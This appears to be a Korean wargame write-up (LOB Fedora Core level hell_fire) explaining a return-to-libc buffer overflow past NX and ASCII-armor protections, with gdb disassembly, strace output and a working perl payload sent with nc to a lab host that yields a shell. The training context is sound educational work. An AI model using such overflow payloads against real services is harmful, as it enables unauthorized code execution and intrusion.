#Env
- NX
- ascii armor
- random stack
#Technic
- do_system RTL
hell_fire.c 소스
[dark_eyes@Fedora_1stFloor ~]$ cat /etc/xinetd.d/hell_fire
service hell_fire
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = hell_fire
server = /home/dark_eyes/hell_fire
}
1. xineted로 데몬이 구동되고 있어서 자동으로 표준입출력인 연결된다.
2. system함수를 사용할 때 local환경에서는 disable_priv_mode() 함수에 의해 euid를 현재 사용자의 uid로 변경하지만 remote 환경에서는그대로 권한을 받아온다.
exploit은 execve("/bin/sh", 0, 0)을 실행하는 곳으로 RTL하는 것이다.
system -> do_system -> "/bin/sh"를 실행하는 execve 주소
(gdb) disass system
Dump of assembler code for function system:
0x007507c0 <system+0>: push %ebp
0x007507c1 <system+1>: mov %esp,%ebp
0x007507c3 <system+3>: sub $0xc,%esp
....
0x007507fe <system+62>: jmp 0x750320 <do_system>
0x00750803 <system+67>: lea 0xffff4617(%ebx),%eax
0x00750809 <system+73>: call 0x750320 <do_system>
[000a6161] --- SIGSEGV (Segmentation fault) @ 0 (0) ---
upeek: ptrace(PTRACE_PEEKUSER,3454,48,0): No such process
[????????] +++ killed by SIGSEGV +++
[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "a"x270, "\n"';cat)|strace -i ./hell_fire
[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "a"x268, "\x84\x07\x75\x00"';cat)| nc 192.168.11.137 7777
hell_fire : What's this smell?
you :
id
uid=503(hell_fire) gid=503(hell_fire) context=user_u:system_r:unconfined_t
my-pass
euid = 503
sign me up
'Wargame > LOB_FC' 카테고리의 다른 글
[LOB_FC3] hell_fire ->evil_wizard (0) | 2014.07.19 |
---|---|
[LOB_FC3] iron_golem -> dark_eyes (0) | 2014.07.12 |
[LOB_FC3] gate ->iron_golem (0) | 2014.07.05 |
[LOB_FC4] cruel -> enigma (0) | 2012.08.24 |
[LOB_FC4] dark_stone -> cruel (0) | 2012.08.20 |